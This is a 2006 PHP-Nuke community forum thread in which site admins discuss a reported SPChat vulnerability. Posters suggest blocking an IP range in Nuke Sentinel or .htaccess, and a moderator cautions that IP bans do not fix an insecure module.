This is an old thread, but I'm wondering if this is still an issue with the latest SPChat, and is there anything in RavenPHP (Nuke Sentinel) I need or should do?

Thanks

Guardian2003
Site Admin



Joined: Aug 28, 2003
Posts: 6799
Location: Ha Noi, Viet Nam

Posted: Tue Jul 11, 2006 9:47 am

I thought everyone was aware of the SPChat problem.
Perhaps it is time for an authoritative list of known vulnerable modules and other add-ons/hacks?
 
JediAaron







Posted: Tue Jul 11, 2006 9:59 am

Well, I knew it had issues; what doesn't these days (other than Raven? :p).

The people at the site wanted to chit-chat; it's the best program I could find. But I was wondering what the best steps are to protect myself. I see Raven posted a reply above; didn't know if there was something via Sentinel I could do.
 
Guardian2003







Posted: Tue Jul 11, 2006 10:02 am

As Raven posted, you could add the following range to Nuke Sentinel's blocked ranges:
200.0.0.0 to 200.63.255.255
But you can always use htaccess, which will prevent them even reaching the site.


JediAaron







Posted: Tue Jul 11, 2006 10:05 am

Guardian2003 wrote:
As Raven posted, you could add the following range to Nuke Sentinel's blocked ranges:
200.0.0.0 to 200.63.255.255


Thank you, kind sir. Just wanted to double check.

It is done.
 
Gremmie
Former Moderator in Good Standing



Joined: Apr 06, 2006
Posts: 2415
Location: Iowa, USA

Posted: Tue Jul 11, 2006 12:07 pm

JediAaron wrote:
The people at the site wanted to chit-chat; it's the best program I could find.


Did you look at php121?
 
montego
Site Admin



Joined: Aug 29, 2004
Posts: 9457
Location: Arizona

Posted: Wed Jul 12, 2006 6:31 am

JediAaron, please understand that if SPChat is vulnerable, banning IP addresses does not solve the problem; it only stops the few folks who were doing the hacking earlier from accessing your site.

Just did not want you to feel overly confident and get hacked. Nuke, or any other system, is only as good as its "weakest link".

Unfortunately, I cannot comment on chat programs as I do not have time to review them for security holes, and I'd probably miss them anyway. Just saying this to "be careful" and make a truly educated, well-considered decision.

Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 